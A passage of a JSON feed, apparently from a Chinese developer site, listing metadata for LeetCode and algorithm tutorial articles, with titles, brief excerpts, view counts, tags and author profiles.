6992970434635366437, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6967153378098937870", "article_info": {"article_id": "6967153378098937870", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "", "cover_image": "https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/ff3ed96779ff4852af36ed2088f82e9a~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "HOT100——寻找两个正序数组的中位数(JS实现)", "brief_content": "题目描述 解题思路 本题采用双指针的解题方法。 一个指针指向数组1。 一个指针指向数组2。 依次比较两个指针指向的元素的大小,谁小谁加到排序好的数组中,直到一方遍历完,将没遍历完的全部加到排序好的数组", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1622166882", "mtime": "1622442618", "rtime": "1622442618", "draft_id": "6967151050621091853", "view_count": 259, "collect_count": 0, "digg_count": 6, "comment_count": 0, "hot_index": 18, "is_hot": 0, "rank_index": 0.00066713, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, 
"is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88827, "concern_user_count": 527704}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}], "user_interact": {"id": 6967153378098937870, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6992586885902106638", "article_info": {"article_id": 
"6992586885902106638", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 41 First Missing Positive (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第4天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉", "is_english": 0, "is_original": 1, "user_index": 2.171231765800281, "original_type": 0, "original_author": "", "content": "", "ctime": "1628088582", "mtime": "1628132875", "rtime": "1628132875", "draft_id": "6992575962252591135", "view_count": 75, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00065989, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, 
"mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6992586885902106638, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6995175994487210020", "article_info": {"article_id": "6995175994487210020", "user_id": "3025489497950094", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/aeb15127921a42ba842febd8d3b778d2~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "「前端刷题」11. 
盛最多水的容器", "brief_content": "给你 n 个非负整数 a1,a2,...,a``n,每个数代表坐标中的一个点 (i, ai) 。在坐标内画 n 条垂直线,垂直线 i", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1628691460", "mtime": "1628738305", "rtime": "1628738305", "draft_id": "6995175153990795301", "view_count": 60, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 4, "is_hot": 0, "rank_index": 0.00065931, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3025489497950094", "user_name": "明无生", "company": "武林", "job_title": "侠客", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/2d4deb94951dc1809fbb962839fc092f~300x300.image", "level": 1, "description": "无怨无悔我走我路,走不尽天涯路。", "followee_count": 0, "follower_count": 0, "post_article_count": 31, "digg_article_count": 2, "got_digg_count": 12, "got_view_count": 1807, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 30, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", 
"show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6995175994487210020, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6964541421487390734", "article_info": {"article_id": "6964541421487390734", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "https://p6-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/b3e40c67f2364fb9bd95b7728248da46~tplv-k3u1fbpfcp-watermark.image", "is_gfw": 0, "title": "剑指Offer——把字符串转换成整数(JS实现)", "brief_content": "题目描述 解题思路 本题需要考虑的一是数值是由范围的,其次就是正则表达式怎么写,当然本题也可以不使用正则表达式,但是本次题解采用的是正则,因为这样简单易懂。 首先去除字符串两侧的空格。 使用正则表达式", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1621558736", "mtime": "1621578897", "rtime": "1621578897", "draft_id": "6964539746294956046", "view_count": 317, "collect_count": 0, "digg_count": 5, "comment_count": 0, "hot_index": 20, "is_hot": 0, "rank_index": 0.00065754, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": 
"https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6964541421487390734, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6983929411657531423", "article_info": {"article_id": "6983929411657531423", "user_id": "2568097069536599", "category_id": "6809637767543259144", "tag_ids": [6809640499062767624, 
6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode第86题:分隔链表", "brief_content": "题干 给你一个链表的头节点 head 和一个特定值 x ,请你对链表进行分隔,使得所有 小于 x 的节点都出现在 大于或等于 x 的节点之前。 你应当 保留 两个分区中每个节点的初始相对位置。 实例1", "is_english": 0, "is_original": 1, "user_index": 2.234293227019025, "original_type": 0, "original_author": "", "content": "", "ctime": "1626072831", "mtime": "1626081795", "rtime": "1626081795", "draft_id": "6983929318850658340", "view_count": 100, "collect_count": 1, "digg_count": 2, "comment_count": 0, "hot_index": 7, "is_hot": 0, "rank_index": 0.00065723, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2568097069536599", "user_name": "奥奥奥", "company": ".", "job_title": "💰端开发", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1a54c595972706e5b0bc897159879404~300x300.image", "level": 2, "description": "", "followee_count": 7, "follower_count": 20, "post_article_count": 134, "digg_article_count": 189, "got_digg_count": 239, "got_view_count": 13812, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 377, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", 
"icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}, {"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6983929411657531423, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6991837040962699277", "article_info": {"article_id": "6991837040962699277", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 39 Combination Sum (Tag:Array Difficulty:Medium)|8月更文挑战", "brief_content": "前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉得有帮助的话,记得多多点赞关注哦,感谢! 
题目描述 给定一个", "is_english": 0, "is_original": 1, "user_index": 2.356581185211474, "original_type": 0, "original_author": "", "content": "", "ctime": "1627913940", "mtime": "1627962203", "rtime": "1627962203", "draft_id": "6991823327430098951", "view_count": 65, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 3, "is_hot": 0, "rank_index": 0.00065027, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 
1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6991837040962699277, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6987217727769280519", "article_info": {"article_id": "6987217727769280519", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640499062767624], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 34 Find First and Last Position of Element (Tag:Array Difficulty:Mid)", "brief_content": "前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。觉得有帮助的话,记得多多点赞关注哦,感谢! 题目描述 给定一个", "is_english": 0, "is_original": 1, "user_index": 2.390835950622662, "original_type": 0, "original_author": "", "content": "", "ctime": "1626838466", "mtime": "1626849913", "rtime": "1626849913", "draft_id": "6986944101065162760", "view_count": 100, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 5, "is_hot": 0, "rank_index": 0.00063765, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, 
"select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546592, "tag_id": "6809640499062767624", "tag_name": "算法", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/68a1097944c7fa1d7961.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1439503293, "mtime": 1631692675, "id_type": 9, "tag_alias": "", "post_article_count": 23471, "concern_user_count": 310821}], "user_interact": {"id": 6987217727769280519, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6971696625462984711", "article_info": {"article_id": "6971696625462984711", "user_id": "2559318802828711", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "https://p9-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/db6e9c9f6dab4cfe9e4318fa830ccd60~tplv-k3u1fbpfcp-watermark.image", 
"is_gfw": 0, "title": "HOT100——括号生成(JS实现)", "brief_content": "题目描述 解题思路 本题采用DFS的思想。 只要有左括号剩余的时候,就将左括号剩余数量-1,然后继续投入DFS。 当左括号的长度小于有括号的长度时,将右括号剩余数量-1,然后继续投入DFS。 实现代码", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623224786", "mtime": "1623305940", "rtime": "1623305940", "draft_id": "6971680263206076452", "view_count": 245, "collect_count": 0, "digg_count": 3, "comment_count": 0, "hot_index": 15, "is_hot": 0, "rank_index": 0.0006289, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2559318802828711", "user_name": "Always_positive", "company": "西安电子科技大学", "job_title": "终身学习者", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/517e82e4420199f579614e9a85b16cf6~300x300.image", "level": 3, "description": "自律、学习", "followee_count": 111, "follower_count": 466, "post_article_count": 521, "digg_article_count": 733, "got_digg_count": 1325, "got_view_count": 53315, "post_shortmsg_count": 17, "digg_shortmsg_count": 24, "isfollowed": false, "favorable_author": 0, "power": 1859, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": 
"https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88827, "concern_user_count": 527704}], "user_interact": {"id": 6971696625462984711, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6994821895350648863", "article_info": {"article_id": "6994821895350648863", "user_id": "2181848597012078", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "LeetCode 51 N-Queens (Tag:Array Difficulty:Hard)", "brief_content": "这是我参与8月更文挑战的第10天,活动详情查看:8月更文挑战 前言 关于 LeetCode 数组类型题目的相关解法,可见LeetCode 数组类型题目做前必看,分类别解法总结了题目,可以用来单项提高。", "is_english": 0, "is_original": 1, "user_index": 1.915155642176354, "original_type": 0, "original_author": "", "content": "", "ctime": "1628608957", "mtime": "1628656839", "rtime": "1628656839", "draft_id": "6994808610542845960", "view_count": 45, "collect_count": 0, "digg_count": 0, "comment_count": 0, "hot_index": 2, "is_hot": 0, "rank_index": 0.00062269, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2181848597012078", "user_name": "AllenLMN", "company": "", "job_title": "前端工程师", "avatar_large": 
"https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/4d4ee02816f30af451bdf84282e122d9~300x300.image", "level": 1, "description": "会点NLP的前端开发萌新,目标是 瘦十斤换头像", "followee_count": 40, "follower_count": 3, "post_article_count": 34, "digg_article_count": 15, "got_digg_count": 29, "got_view_count": 3623, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 65, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546983, "tag_id": "6809641039037464589", "tag_name": "LeetCode", "color": "#000000", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/155748584224691639f51dce773ead8d4233400c24546.jpg~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1489518382, "mtime": 1631692819, "id_type": 9, "tag_alias": "", "post_article_count": 6296, "concern_user_count": 11301}], "user_interact": {"id": 6994821895350648863, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516023101020405304626004CE7"}, {"article_id": "6941172390973931557", "article_info": {"article_id": "6941172390973931557", "user_id": "3711585972125896", "category_id": "6809637767543259144", "tag_ids": [6809641039037464589], 
"visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "leetcode : 3无重复字符最长子串(中等)", "brief_content": "给定一个字符串,请你找出其中不含有重复字符的 最长子串 的长度。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1616117653", "mtime": "1616135281", "rtime": "1616135281", "draft_id": "6941147270951731237", "view_count": 233, "collect_count": 1, "digg_count": 21, "comment_count": 1, "hot_index": 33, "is_hot": 0, "rank_index": 0.00062004, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3711585972125896", "user_name": "YU_yu", "company": "东华理工菜鸟公司", "job_title": "大三学生", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/1dbe84270742d689fb5cf84549fb4145~300x300.image", "level": 2, "description": "前端划水小菜鸡", "followee_count": 13, "follower_count": 23, "post_article_count": 8, "digg_article_count": 63, "got_digg_count": 175, "got_view_count": 4473, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 219, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, 